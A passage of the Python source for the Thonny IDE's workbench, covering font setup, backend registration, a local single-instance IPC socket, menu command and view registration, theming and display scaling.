name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _add_main_backends(self) -> None:
self.set_default("run.backend_name", "SameAsFrontend")
self.set_default("CustomInterpreter.used_paths", [])
self.set_default("CustomInterpreter.path", "")
from thonny import running_config_page
self.add_backend(
"SameAsFrontend",
running.SameAsFrontendCPythonProxy,
_("The same interpreter which runs Thonny (default)"),
running_config_page.SameAsFrontEndConfigurationPage,
"1",
)
self.add_backend(
"CustomCPython",
running.CustomCPythonProxy,
_("Alternative Python 3 interpreter or virtual environment"),
running_config_page.CustomCPythonConfigurationPage,
"2",
)
self.add_backend(
"PrivateVenv",
running.PrivateVenvCPythonProxy,
_("A special virtual environment (deprecated)"),
running_config_page.PrivateVenvConfigurationPage,
"z",
)
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(thonny.IPC_FILE):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.IPC_FILE, "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.IPC_FILE)
secret = ""
os.chmod(thonny.IPC_FILE, 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
_("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", _("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
_("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
_("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
_("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
_("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
_("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
_("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
_("Change font size"),
caption=_("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
_("Exit Thonny"),
self._on_close,
image="quit",
caption=_("Quit"),
include_in_toolbar=True,
group=101,
)
if self.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
# Main frame functions as
# - a backgroud behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
else:
_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assing names to related classes
proxy_class.backend_name = name # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(_("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(_("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=_("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
_("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=_("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
_("Regular mode"),
_(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
)
label.bind("<1>", on_click, True)
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(self, filename: str, tk_name: Optional[str] = None) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView') """
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto",
view.home_widget, # type: ignore
text=self._view_records[view_id]["label"],
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return None
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logging.getLogger("thonny").exception(
"Can't remove binding for '%s' and '%s'", sequence, func
)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
